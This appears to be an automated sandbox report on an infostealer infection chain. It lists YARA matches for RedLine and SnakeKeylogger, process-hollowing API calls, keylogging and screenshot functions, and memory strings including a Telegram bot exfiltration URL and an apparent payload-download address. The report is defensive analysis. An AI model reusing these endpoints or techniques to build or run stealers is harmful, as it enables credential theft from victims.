                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                        Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                        Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241928880.0000000021FEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000002.2466353170.0000000020956000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000002.2601418278.0000000020836000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.drString found in binary or memory: http://www.pmail.com0
                        Source: powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                        Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: x.exe, 00000004.00000002.2175552195.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/H
                        Source: x.exe, 00000004.00000002.2212967585.000000002090D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200
                        Source: x.exe, 00000004.00000002.2212967585.000000002090D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2175552195.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                        Source: x.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvwuk
                        Source: x.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com:443/wps/200_Oupzhkprnvw
                        Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                        Source: rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drString found in binary or memory: https://reallyfreegeoip.org/xml/
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.1d
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49712 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: Microsofts.exe.8.dr, UltraSpeed.cs.Net Code: TakeScreenshot
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                        Source: Microsofts.exe.8.dr, UltraSpeed.cs.Net Code: VKCodeToUnicode
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                        Source: Yara matchFile source: Process Memory Space: x.exe PID: 5792, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: 31.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 31.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 31.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 26.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 31.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 26.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 26.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 26.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 8.2.rpkhzpuO.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 21.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 8.2.rpkhzpuO.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: Trading_AIBot.exe.8.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                        Source: 8.2.rpkhzpuO.pif.255bb674.7.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                        Source: 8.2.rpkhzpuO.pif.255aa218.8.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.9.dr 665670656Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3824C NtReadVirtualMemory,4_2_02B3824C
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B384BC NtUnmapViewOfSection,4_2_02B384BC
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02B3DAC4
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B3DA3C
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02B3DBA8
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B38BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B38BA8
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B379AC NtAllocateVirtualMemory,4_2_02B379AC
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B37CF8 NtWriteVirtualMemory,4_2_02B37CF8
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B38BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B38BA6
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B379AA NtAllocateVirtualMemory,4_2_02B379AA
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B3D9E8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD824C NtReadVirtualMemory,22_2_02BD824C
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD84BC NtUnmapViewOfSection,22_2_02BD84BC
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BDDAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,22_2_02BDDAC4
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BDDA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,22_2_02BDDA3C
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,22_2_02BD8BA8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BDDBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,22_2_02BDDBA8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD79AC NtAllocateVirtualMemory,22_2_02BD79AC
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD7CF8 NtWriteVirtualMemory,22_2_02BD7CF8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,22_2_02BD8BA6
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BD79AA NtAllocateVirtualMemory,22_2_02BD79AA
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BDD9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,22_2_02BDD9E8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB824C NtReadVirtualMemory,28_2_02AB824C
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB84BC NtUnmapViewOfSection,28_2_02AB84BC
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02ABDAC4 NtCreateFile,NtWriteFile,NtClose,28_2_02ABDAC4
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02ABDA3C NtDeleteFile,28_2_02ABDA3C
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB8BA8 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,28_2_02AB8BA8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02ABDBA8 NtOpenFile,NtReadFile,NtClose,28_2_02ABDBA8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB79AC NtAllocateVirtualMemory,28_2_02AB79AC
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB7CF8 NtWriteVirtualMemory,28_2_02AB7CF8
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB8BA6 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,28_2_02AB8BA6
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AB79AA NtAllocateVirtualMemory,28_2_02AB79AA
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02ABD9E8 NtDeleteFile,28_2_02ABD9E8
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B385D4 CreateProcessAsUserW,4_2_02B385D4
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B220C44_2_02B220C4
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B4D5964_2_02B4D596
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00408C608_2_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0040DC118_2_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00407C3F8_2_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00418CCC8_2_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00406CA08_2_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004028B08_2_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0041A4BE8_2_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004182448_2_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004016508_2_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00402F208_2_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004193C48_2_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004187888_2_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00402F898_2_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00402B908_2_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004073A08_2_004073A0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_252B10208_2_252B1020
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_252B10308_2_252B1030
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00408C608_1_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_0040DC118_1_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00407C3F8_1_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00418CCC8_1_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00406CA08_1_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004028B08_1_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_0041A4BE8_1_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004182448_1_00418244
